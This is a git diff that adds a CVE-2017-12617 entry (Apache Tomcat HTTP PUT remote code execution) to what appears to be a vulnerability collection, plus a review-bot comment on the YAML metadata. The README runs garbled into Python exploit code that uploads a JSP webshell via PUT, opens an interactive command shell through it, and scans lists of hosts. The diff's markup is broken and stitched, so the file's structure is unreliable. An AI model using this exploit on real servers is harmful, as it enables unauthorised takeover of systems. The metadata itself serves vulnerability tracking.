diff --git a/cve/apache-tomcat/2017/CVE-2017-12617/README.md b/cve/apache-tomcat/2017/CVE-2017-12617/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..8eb453be0abff27766296b0b86d5793a13134585
--- /dev/null
+++ b/cve/apache-tomcat/2017/CVE-2017-12617/README.md
@@ -0,0 +1,57 @@
+# CVE-2017-12617
+CVE-2017-12617 critical Remote Code Execution (RCE) vulnerability discovered in Apache Tomcat
+
+
+
affect systems with HTTP PUTs enabled (via setting the "read-only" initialization parameter of the Default servlet to "false") are affected. + +
Tomcat versions before 9.0.1 (Beta), 8.5.23, 8.0.47 and 7.0.82 contain a potentially dangerous +
remote code execution (RCE) vulnerability on all operating systems if the default servlet is +
configured with the parameter readonly set to false or the WebDAV servlet is enabled with the +
parameter readonly set to false
+
+# Apache Tomcat page
+
+
+
./cve-2017-12617.py [options]
+
+
options:
+
+
-u ,--url [::] check target url if it's vulnerable
+
-p,--pwn [::] generate webshell and upload it
+
-l,--list [::] hosts list
+
+
[+]usage:
+
+
./cve-2017-12617.py -u http://127.0.0.1
+
./cve-2017-12617.py --url http://127.0.0.1
+
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
+
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
+
./cve-2017-12617.py -l hotsts.txt
+
./cve-2017-12617.py --list hosts.txt
+
+
+
<%=output %>""" + + + + headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + requests.packages.urllib3.disable_warnings() + req=requests.put(str(url)+f+"/",data=EVIL, headers=headers,verify=False) + + + +def shell(url,f): + + while True: + headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + cmd=raw_input("$ ") + payload={'cmd':cmd} + if cmd=="q" or cmd=="Q": + break + requests.packages.urllib3.disable_warnings() + re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers,verify=False) + re=str(re.content) + t=removetags(re) + print t + + + + + +#print bcolors.HEADER+ banner+bcolors.ENDC + +parse=OptionParser( + + +bcolors.HEADER+""" + + + _______ ________ ___ ___ __ ______ __ ___ __ __ ______ + / ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ | + | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / / + | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / / + | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / / + \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/ + + + + +./cve-2017-12617.py [options] + +options: + +-u ,--url [::] check target url if it's vulnerable +-p,--pwn [::] generate webshell and upload it +-l,--list [::] hosts list + +[+]usage: + +./cve-2017-12617.py -u http://127.0.0.1 +./cve-2017-12617.py --url http://127.0.0.1 +./cve-2017-12617.py -u http://127.0.0.1 -p pwn +./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn +./cve-2017-12617.py -l hotsts.txt +./cve-2017-12617.py --list hosts.txt + + +[@intx0x80] + +"""+bcolors.ENDC + + ) + + +parse.add_option("-u","--url",dest="U",type="string",help="Website Url") +parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it") +parse.add_option("-l","--list",dest="L",type="string",help="hosts File") + 
+(opt,args)=parse.parse_args() + +if opt.U==None and opt.P==None and opt.L==None: + print(parse.usage) + exit(0) + + + +else: + if opt.U!=None and opt.P==None and opt.L==None: + print bcolors.OKGREEN+banner+bcolors.ENDC + url=str(opt.U) + checker="Poc.jsp" + print bcolors.BOLD +"Poc Filename {}".format(checker) + createPayload(str(url)+"/",checker) + con=getContent(str(url)+"/",checker) + if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con: + print bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC + print bcolors.WARNING+url+"/"+checker+bcolors.ENDC + + else: + print 'Not Vulnerable to CVE-2017-12617 ' + elif opt.P!=None and opt.U!=None and opt.L==None: + print bcolors.OKGREEN+banner+bcolors.ENDC + pwn=str(opt.P) + url=str(opt.U) + print "Uploading Webshell ....." + pwn=pwn+".jsp" + RCE(str(url)+"/",pwn) + shell(str(url),pwn) + elif opt.L!=None and opt.P==None and opt.U==None: + print bcolors.OKGREEN+banner+bcolors.ENDC + w=str(opt.L) + f=open(w,"r") + print "Scaning hosts in {}".format(w) + checker="Poc.jsp" + for i in f.readlines(): + i=i.strip("\n") + createPayload(str(i)+"/",checker) + con=getContent(str(i)+"/",checker) + if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con: + print str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m" + + + + + + + + + + + + diff --git a/cve/apache-tomcat/2017/yaml/CVE-2017-12617.yaml b/cve/apache-tomcat/2017/yaml/CVE-2017-12617.yaml new file mode 100644 index 0000000000000000000000000000000000000000..28fd6b2b9b56c3ce94c550f6d016aa51048cf039 --- /dev/null +++ b/cve/apache-tomcat/2017/yaml/CVE-2017-12617.yaml 
@@ -0,0 +1,19 @@
+id: CVE-2017-12617
+source: https://github.com/cyberheartmi9/CVE-2017-12617
+info:
+ name: Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。
+ description:
+ 如果默认servlet配置为参数readonly设置为false,或者WebDAV servlet启用为参数readonly设置为false时,所有操作系统上都存在emote代码执行(RCE)漏洞。
+ scope-of-influence:
+ tomcat versions before 9.0.1 (Beta), 8.5.23, 8.0.47 and 7.0.82
+ reference:
+ - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2017-12617
+ - https://nvd.nist.gov/vuln/detail/cve-2017-12617
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.1
+ cve-id: CVE-2017-12617
+ cwe-id: CWE-434
+ cnvd-id: None
+ kve-id: None
+ tags: cve2017, Apache, Tomcat,RCE
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 211571f6447ebe793ef2ea64e87df544374ff211..f8c8e0771e3fcf5a97dc886787479a601e12b16e 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -30,6 +30,7 @@ cve:
 - CVE-2022-29885
 - CVE-2020-9484
 - CVE-2020-1938
+ - CVE-2017-12617
 apache-Spark:
 - CVE-2022-33891
 apache-Flink:
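Review bot: The `description` value in cve/apache-tomcat/2017/yaml/CVE-2017-12617.yaml contains the typo `emote代码执行`, which should read `远程代码执行(RCE)漏洞`; as written a truncated English word is mixed into the Chinese sentence. The entry would also serve defenders better if it said that `readonly` defaults to true in a stock Tomcat configuration, so only deployments that explicitly set it to false on the Default or WebDAV servlet are exposed, and that the remediation is to upgrade to a fixed release or restore `readonly=true`. The `scope-of-influence` line gives one "before" list covering four release branches; stating the affected range per branch would be easier to match against an inventory. The `tags` list is inconsistently spaced (`Tomcat,RCE`), which is harmless in a plain string but worth normalising to `cve2017, Apache, Tomcat, RCE`.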